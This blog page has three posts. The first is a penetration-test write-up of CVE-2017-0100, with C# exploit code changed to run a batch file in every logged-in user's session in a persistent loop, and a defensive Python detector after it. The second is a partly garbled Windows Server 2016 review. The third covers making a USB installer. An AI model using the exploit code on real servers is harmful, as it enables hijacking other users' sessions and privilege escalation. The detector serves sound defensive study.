Thursday, April 13, 2017


Windows Server 2012 R2 with the process of sharing
0x01 Overview
After gaining low-privileged access to a Windows Server 2012 R2 host we stopped making progress, and then we noticed CVE-2017-0100, which in theory allowed us to execute payloads in each user's active session on the server. The vulnerability and its proof of concept were filed by James Forshaw; we modified the proof of concept to suit our situation. The proof of concept uses a session moniker with a DCOM activator to let a user start any process in the session of another logged-in user.

After analyzing the original proof of concept, we needed to make some changes to suit our situation.
1) Determine what type of payload is feasible with this vulnerability, and how the modified payload is located and executed.
Here is the original code:
Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep(20000);
// Bind to the help pane COM server inside the target session via a session moniker
IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
server.Execute(target.AbsoluteUri);
After determining that the target parameter is essentially the path to an executable file, the first thing we tried was the Regsvr32.exe payload published on Casey Smith's blog. However, we could not get the Execute function of IHxHelpPaneServer to accept the parameters.

We decided to find a path and put a small .bat file inside it; the path that every user can access is "C:\TEMP\".

Here is our modified code:
Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep
2) Make the exploit execute code in every session, not just one

The original proof of concept collects the session ID of every session on the host, but then executes code in only one session.
Here is the original code:
try {
    int current_session_id = Process.GetCurrentProcess().SessionId;
    int new_session_id = 0;
    Console.WriteLine("Waiting For a Target Session");
    while (true)
    {
        // All session IDs on the host except our own
        IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
        if (sessions.Count() > 0)
        {
            // Only the first session found is ever used
            new_session_id = sessions.First();
            break;
        }
        Thread.Sleep(1000);
    }
    // ... (excerpt; the rest of the try block follows)
Our situation required executing code in the context of every user, not just the first session. To do this, we simply pick a session at random from the existing IEnumerable "sessions" object and use that session to run our payload. Because the selection is random, the code can be executed twice for the same user.
Here is our modified code:
try {
    int current_session_id = Process.GetCurrentProcess().SessionId;
    int new_session_id = 0;
    Console.WriteLine("Waiting For a Target Session");
    while (true)
    {
        // All session IDs on the host except our own
        IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
        if (sessions.Count() > 0)
        {
            // Pick one of the other sessions at random
            Random rnd = new Random();
            int r = rnd.Next(sessions.Count());
            new_session_id = sessions.ElementAt(r);
            break;
        }
        Thread.Sleep(1000);
    }
    // ... (excerpt; the rest of the try block follows)
3) Keep the exploit running until we manually kill the process

The original code executes once and then exits. To solve this, we only need to move the IHxHelpPaneServer call inside the while loop.

Here is the original code:
try {
    int current_session_id = Process.GetCurrentProcess().SessionId;
    int new_session_id = 0;
    Console.WriteLine("Waiting For a Target Session");
    while (true)
    {
        // All session IDs on the host except our own
        IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
        if (sessions.Count() > 0)
        {
            new_session_id = sessions.First();
            break;
        }
        Thread.Sleep(1000);
    }

    // Runs once, after the loop has found a session, then the program exits
    Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
    Thread.Sleep(20000);
    IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
    Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
    server.Execute(target.AbsoluteUri);
} catch (Exception ex) {
    Console.WriteLine(ex);
}
Here is the code we modified:
try {
    int current_session_id = Process.GetCurrentProcess().SessionId;
    int new_session_id = 0;
    Console.WriteLine("Waiting For a Target Session");
    while (true)
    {
        // All session IDs on the host except our own
        IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
        if (sessions.Count() > 0)
        {
            // Pick one of the other sessions at random
            Random rnd = new Random();
            int r = rnd.Next(sessions.Count());
            new_session_id = sessions.ElementAt(r);
            Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
            Thread.Sleep(20000);
            IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
            // The .bat file placed in the path every user can access
            Uri target = new Uri("C:\\TEMP\\testing.bat");
            server.Execute(target.AbsoluteUri);
        }
        // No break: the loop repeats until the process is killed manually
        Thread.Sleep(60000);
    }
} catch (Exception ex) {
    Console.WriteLine(ex);
}
Conclusion

We were pleased to be able to modify James Forshaw's exploit to fit our situation and use it successfully; in the end we obtained shells for each user on the remote desktop server. With these privileges, we could escalate to domain administrator.
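
A defender's view of the technique above, as an added example that is not part of the original post: it scans process-creation records for children of HelpPane.exe and for the same command line turning up in several sessions, which is the pattern the modified loop produces. The record fields and sample events are constructed, and the example assumes the IHxHelpPaneServer class is hosted by HelpPane.exe, so that anything started through Execute appears as its child.

```python
from collections import defaultdict
from ntpath import basename  # parses Windows paths on any OS


def _ev(time, session, user, parent, cmdline):
    """Build one constructed process-creation record (fields are this example's own)."""
    return dict(time=time, session=session, user=user, parent=parent, cmdline=cmdline)


# Assumption: the COM server behind IHxHelpPaneServer runs in HelpPane.exe.
HELP = r"C:\Windows\helppane.exe"
EXPLORER = r"C:\Windows\explorer.exe"
BAT = r'C:\Windows\System32\cmd.exe /c "C:\TEMP\testing.bat"'

# Constructed sample events; times are seconds, spaced like the post's
# 20 s + 60 s loop. Session 3 is hit twice because selection is random.
EVENTS = [
    _ev(0, 2, r"CORP\alice", EXPLORER, "notepad.exe"),
    _ev(80, 3, r"CORP\bob", HELP, BAT),
    _ev(160, 4, r"CORP\carol", HELP, BAT),
    _ev(240, 3, r"CORP\bob", HELP, BAT),
    _ev(300, 4, r"CORP\carol", EXPLORER, "cmd.exe"),
]


def helppane_children(events):
    """Return the records whose parent process is HelpPane.exe."""
    want = basename(HELP).lower()
    return [e for e in events if basename(e["parent"]).lower() == want]


def cross_session_hits(events, min_sessions=2):
    """Map each HelpPane child command line to the sessions it ran in,
    keeping only those seen in at least min_sessions distinct sessions."""
    seen = defaultdict(set)
    for e in helppane_children(events):
        seen[e["cmdline"].lower()].add(e["session"])
    return {cmd: sorted(s) for cmd, s in seen.items() if len(s) >= min_sessions}


if __name__ == "__main__":
    for e in helppane_children(EVENTS):
        print("review:", e["time"], e["session"], e["user"], e["cmdline"])
    for cmd, sessions in cross_session_hits(EVENTS).items():
        print("same command in sessions", sessions, "->", cmd)
```
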

Friday, March 31, 2017

How to evaluate Windows Server 2016?

Most desktop functions work properly, and NVIDIA Optimus dual graphics can also be used normally, but there is no UWP application support: no application store, Cortana, Edge browser and the like, though I heard that PowerShell can install some offline UWP packages. There is no WSL subsystem, but it can be transplanted (I will write a detailed description of the game) slightly but the basic operation of the game, the registry which is best to set up hardware acceleration.
(On my notebook the touchpad and a Serial IO driver would not install.) As a desktop system it is still good, with fuller functionality than in the 2012 R2 era.

The Microsoft Imagine program already offers serial numbers; a student account can get a Retail key.
I will not evaluate server use for now; as a long-time Linux fan I cannot stand using such a broken thing on a server.
Added: compared with the desktop system, you can completely kill Windows Defender, this annoying stuff.
Looking at the features, the main improvements are as follows: 1. Software-defined networking 2. Better Hyper-V virtualization 3. Native support for Windows Server containers as well as Hyper-V containers. Combined with the Datacenter edition's automatic activation of an unlimited number of virtual machines, this generation of Windows Server is obviously aimed at cloud servers. What surprised me most is Nano Server, whose install image is only 172MB; it supports the vast majority of ordinary Windows Server functions and removes the burden of the GUI and other server-related components, it is home travel kill,
I installed it before the RTM came out, then changed from the evaluation version to the official version, and later was too lazy to change to the RTM (mainly because I did not want to reinstall the software; the original was an upgrade installation, and the evaluation version and the RTM are said to be no different). It feels almost the same as Win 2012 R2, with Bluetooth added, but that is of no real use. Unlike Win10, it does not install drivers automatically, which is one difference. Later, after the drivers were installed, Device Manager still showed an unknown device, and I do not know what it is. The only really annoying problem is that the screen sometimes becomes garbled; minimizing and maximizing again fixes it. I do not know what is to blame; other software has no problems for now.

Wednesday, March 8, 2017

Install Windows Server 2012

I recently bought a Dell server; installing Windows Server 2012 on it was quite troublesome.
1. Download the Windows Server 2012 ISO image file;
2. Make a USB installation drive;
3. Have the RAID driver ready, to be used during installation.

In the second step, making the USB installation drive, a problem occurs because the image contains a file larger than 4G:
Missing installation files.

Here's how to fix this problem.

There are two ways to install from a USB drive.
The first is to write the image to the USB drive in disc format, so that the drive works as a system installation CD; many programs can do this, but the most commonly used is UltraISO.
The second is to write PE to the USB drive. PE is, simply put, a minimal system released by Microsoft that runs only in memory; the system installation is carried out after the PE system has started. This method applies only to installing Windows systems, not Linux.
Some system images cannot be installed from a USB drive this way because install.wim in the image is larger than 4G. The following explains how to make a bootable USB drive from a CD image that contains a file larger than 4G.
The file systems commonly used in Windows (what we usually call the disk format, for example a USB drive in FAT32 format) are mainly FAT32, NTFS and so on. The shortcoming of the FAT32 file system is that it cannot store files larger than 4G; the NTFS file system has no such restriction.
Generally speaking, the first method writes the USB drive in FAT32 format, and the biggest drawback of FAT32 is that every stored file must be smaller than 4G. When we use UltraISO's "write hard disk image" function, whatever file system the USB drive had before, it will be FAT32 once the drive has been made. For CD images that contain files larger than 4G, such as many Windows 7, 8 and 8.1 images, this is bad news: the USB drive cannot correctly store the file larger than 4G, so it simply cannot be used.
First, open the ISO file with UltraISO, delete the file larger than 4G (such as install.wim in the sources directory), and save the ISO file as a new file; do not overwrite the original file! After saving, make the bootable USB drive in the usual way.
After the drive has been made, convert it to the NTFS file system: run CMD as administrator (or press WIN + R), enter the command convert x: /fs:ntfs (x is the drive letter of the USB drive), and press Enter to run it.
Extract the ISO image, or use UltraISO to find install.wim in the sources directory of the ISO, and extract it to the corresponding directory on the USB drive. When writing has completed, the USB drive can be used to install the new system.
Depending on the motherboard BIOS, some computers may need a different "disk master boot record". If the drive will not boot, under "convenient start" select "write the new disk master boot record (MBR)" with USB-HDD+ (you can also choose USB-HDD, USB-ZIP, HDD, etc.; if one does not work, try another).
The above is the tutorial for making a bootable USB drive from an image that contains files larger than 4G. With more and more people making Win8 and Win10 system disks, this tutorial should be a great help.